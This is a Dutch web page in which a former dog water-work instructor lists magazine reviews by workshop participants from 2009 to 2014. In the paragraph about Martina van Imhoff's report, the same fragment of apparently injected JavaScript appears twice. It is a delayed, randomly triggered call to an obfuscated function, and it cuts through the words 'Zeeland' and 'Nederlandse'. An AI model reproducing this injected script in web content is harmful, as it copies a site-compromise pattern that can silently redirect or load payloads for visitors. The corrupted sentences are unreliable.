Waterwerk

 

Gedurende ruim 10 jaar heb ik waterwerk workshops gegeven. Met ingang van 2020 ben ik daarmee gestopt. Hieronder nog wat enthousiaste artikelen van toenmalige workshop deelnemers.

Reviews van deelnemers

In 2014 deed Diny Engels met haar hond Paddy aan een workshop mee en schreef daarover een mooi en grappig artikel voor NovaNews, blad van de Vereniging voor de Nova Scotia Duck Tolling Retriever. Haar stuk werd geplaatst in NovaNews 2014, nr 3 en kun je hier lezen.

Marloes Hoppenbrouwers schreef een ontroerend artikel over haar deelname aan een waterwerk workshop met haar hond Storm. Haar artikel is geplaatst in de nieuwsbrief van de rasclub voor Zwitserse Witte Herders, oktober 2013, nr 2. Het is hier te lezen.

Een verslag van Martina van Imhoff. Zij deed met haar honden Gypsy en Abby mee aan een waterwerk weekend in Zeelandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)} // ]]>and i.s.m. Dogtravel. Martina’s verslag werd geplaatst in Dalmatisch Nieuws 2013, clubblad van de Nederlandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)} // ]]>andse Club voor Dalmatische honden en is hier te lezen.

In het oktobernummer 2010 van het blad Hondenleven schreef Francine de Vries een enthousiast stukje over haar deelname aan twee workshops in dat jaar. Dit stukje is hier te lezen.

In het septembernummer 2009 van het blad Hondenmanieren verscheen een verslag van Marjolein Roosendaal over haar deelname aan een waterwerkworkshop van Agua Fiesta. Haar verslag vind je hier.